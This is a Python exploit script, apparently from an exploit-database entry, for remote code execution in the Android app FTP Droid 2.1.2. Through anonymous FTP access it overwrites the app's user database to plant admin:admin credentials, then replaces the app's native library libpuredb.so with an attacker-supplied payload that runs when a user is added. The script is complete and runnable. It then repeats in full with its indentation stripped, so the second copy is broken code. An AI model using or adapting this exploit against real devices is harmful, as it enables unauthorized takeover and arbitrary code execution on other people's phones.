TheRealJunior/ftpdroid_rce_oneclick.py

## ftpdroid_rce_oneclick.py
# Exploit Title: FTP Droid 2.1.2 Remote Code Execution (1-click)
# Google Dork: [if applicable]
# Date: 30.12.2018
# Exploit Author: Guy Ishay
# Vendor Homepage: https://forum.xda-developers.com/showthread.php?t=1175825
# Software Link: https://play.google.com/store/apps/details?id=berserker.android.apps.ftpdroid
# Version: 2.1.2
# Tested on: Android 4.4
# CVE : None
# ====================
# In order to test:
# Run FTPDroid with anonymous home directory as /
# Start FTPDroid server, and set IP and port accordingly
# After exploiting, try to add a user to FTPDroid and the code will execute.
# Files needed:
# pureftpd.pdb - database file pulled from device after adding user admin:admin in order to overwrite
# user database.
# libpuredb.so - A shared object file with the JNI_OnLoad function
# implemented and exported (this will contains the code you want to run)
from ftplib import FTP
import logging

log = logging.getLogger('ftp_exploit')
log.setLevel(logging.DEBUG)
ch =  logging.StreamHandler()
ch.setLevel(logging.DEBUG)


formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)

log.addHandler(ch)

class Exploit:
    # should have no obvious effect on the target
    def prepare():
        raise Exception('not implemented')

    # bamboozle goes here
    def exploit():
        raise Exception('not implemented')


class FtpExploit(Exploit):
    def __init__(self,ip_addr,port, user_username, user_password):
        self.ip_addr = ip_addr
        self.port = port
        self.user_username = user_username
        self.user_userpassword = user_password
        log.info('creating an instance of FtpExploit')

    def prepare(self):
        # override username & password
        with FTP() as ftp:
            log.info('connecting to ftp server in order to leak username & password')
            ftp.connect(self.ip_addr,self.port, timeout=10)
            log.info('connected successfully to the server')
            ftp.login()
            log.info('successfully logged in anonymously')
            ftp.cwd('/data/data/berserker.android.apps.ftpdroid/bin')
            log.info('changed working directory to app binary container')
            with open('pureftpd.pdb', 'rb') as dbfile:
                log.info('trying to overwrite pure db file')
                ftp.storbinary('STOR pureftpd.pdb', dbfile)
                log.info('exploit preperation successfull')


    def exploit(self):
        with FTP() as ftp:# giving 10 seconds timeout is more than enough
            log.info('trying to connect to ftp server')
            ftp.connect(self.ip_addr,self.port, timeout=10)
            log.info('connected successfully to ftp server')
            log.info('trying to login to ftp server')
            ftp.login(user=self.user_username, passwd=self.user_userpassword)
            log.info('logged in successfully')
            ftp.cwd('/data/data/berserker.android.apps.ftpdroid/lib')
            log.info('changed working directory')
            ftp.delete('libpuredb.so')
            log.info('deleted target shared object')
            with open('libpuredb.so', 'rb') as so_file: # have a libpuredb.so in your clients working directory compiled with JNI_OnLoad for the right arch
                ftp.storbinary('STOR libpuredb.so', so_file)
                log.info('shared object overwritten')
                log.info('exploit successful')


if __name__ == '__main__':
    exp = FtpExploit('10.0.0.63',2221, 'admin', 'admin')
    exp.prepare()
    exp.exploit()
	# Exploit Title: FTP Droid 2.1.2 Remote Code Execution (1-click)
	# Google Dork: [if applicable]
	# Date: 30.12.2018
	# Exploit Author: Guy Ishay
	# Vendor Homepage: https://forum.xda-developers.com/showthread.php?t=1175825
	# Software Link: https://play.google.com/store/apps/details?id=berserker.android.apps.ftpdroid
	# Version: 2.1.2
	# Tested on: Android 4.4
	# CVE : None
	# ====================
	# In order to test:
	# Run FTPDroid with anonymous home directory as /
	# Start FTPDroid server, and set IP and port accordingly
	# After exploiting, try to add a user to FTPDroid and the code will execute.
	# Files needed:
	# pureftpd.pdb - database file pulled from device after adding user admin:admin in order to overwrite
	# user database.
	# libpuredb.so - A shared object file with the JNI_OnLoad function
	# implemented and exported (this will contains the code you want to run)
	from ftplib import FTP
	import logging

	log = logging.getLogger('ftp_exploit')
	log.setLevel(logging.DEBUG)
	ch = logging.StreamHandler()
	ch.setLevel(logging.DEBUG)



	formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
	ch.setFormatter(formatter)

	log.addHandler(ch)

	class Exploit:
	# should have no obvious effect on the target
	def prepare():
	raise Exception('not implemented')

	# bamboozle goes here
	def exploit():
	raise Exception('not implemented')


	class FtpExploit(Exploit):
	def __init__(self,ip_addr,port, user_username, user_password):
	self.ip_addr = ip_addr
	self.port = port
	self.user_username = user_username
	self.user_userpassword = user_password
	log.info('creating an instance of FtpExploit')

	def prepare(self):
	# override username & password
	with FTP() as ftp:
	log.info('connecting to ftp server in order to leak username & password')
	ftp.connect(self.ip_addr,self.port, timeout=10)
	log.info('connected successfully to the server')
	ftp.login()
	log.info('successfully logged in anonymously')
	ftp.cwd('/data/data/berserker.android.apps.ftpdroid/bin')
	log.info('changed working directory to app binary container')
	with open('pureftpd.pdb', 'rb') as dbfile:
	log.info('trying to overwrite pure db file')
	ftp.storbinary('STOR pureftpd.pdb', dbfile)
	log.info('exploit preperation successfull')


	def exploit(self):
	with FTP() as ftp:# giving 10 seconds timeout is more than enough
	log.info('trying to connect to ftp server')
	ftp.connect(self.ip_addr,self.port, timeout=10)
	log.info('connected successfully to ftp server')
	log.info('trying to login to ftp server')
	ftp.login(user=self.user_username, passwd=self.user_userpassword)
	log.info('logged in successfully')
	ftp.cwd('/data/data/berserker.android.apps.ftpdroid/lib')
	log.info('changed working directory')
	ftp.delete('libpuredb.so')
	log.info('deleted target shared object')
	with open('libpuredb.so', 'rb') as so_file: # have a libpuredb.so in your clients working directory compiled with JNI_OnLoad for the right arch
	ftp.storbinary('STOR libpuredb.so', so_file)
	log.info('shared object overwritten')
	log.info('exploit successful')



	if __name__ == '__main__':
	exp = FtpExploit('10.0.0.63',2221, 'admin', 'admin')
	exp.prepare()
	exp.exploit()